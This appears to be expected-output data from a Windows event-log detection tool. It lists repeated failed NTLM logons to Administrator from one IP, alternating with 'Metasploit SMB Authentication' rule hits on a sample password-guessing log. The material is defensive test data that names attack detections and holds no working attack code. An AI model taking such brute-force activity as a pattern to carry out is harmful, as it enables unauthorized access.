+2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XxrR5iUsTI9LVnLL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TxMREacN0QfvL51B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7fbzSHaZBDH4zFZZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NgIei0bMIcslJCVa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JPoKjwanczELBC5A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QOYMVAnCWB2RFYAk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k1S45GBtQ8Uoyilw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 60oeDAnU41sz1wYg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: enjlrrdf6lrm7Bao  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 58WzO6wxh7QshZgS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7eZKzHgu5ADLYsWU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uOSK3xC1E5PpBVNM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vFXasYWGCHbQOWWI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4XlYJ3oHYKYhg0KC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LxOKwi8Q4y2mHBDu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xwFKFySH4w2yWtPX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OlwGTGadOEMfUFiM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hZ9WuMoOtxGdwOQn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cCLK0gWvRoz0Ceao  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZDrcOxtm2fHXK5pO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pm2tPGetcAJkSuvK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FBskiUSfF2ghuDcF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZJal2nq3JAk6I2S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y9ek0Sl1ikhIfIb6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eHrn5Tp9JtnAgCbE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k7tR8gp2piqqixqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SqSBRMoiFeWe4FAt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nu4m1xKDU0OUkoR0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gui98cdQHPgyNOZI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bm4U7TAfsPTEiygC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fDOoaVWVFAMLiA71  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qiJeLgInEkHffefo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yWyguWQP2iYUArhD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vDa3GqsTMMXguFhi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lr0lkAcdnji1zjW4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4WfNFd5MkQxaxHGP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j8hdPhtxP4Ds65yV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y2BBoWoXWXuRysTx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6GEhZ2BduHwjJj9H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GbwEHQCAUJd64LlA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wGfoObbN8ioefyce  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iLHhCgHvmOzoLLqG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v9KL69y47DMyFOWT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ECuVYiqdMw2dMjT6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YJCYumRekD7AREYQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
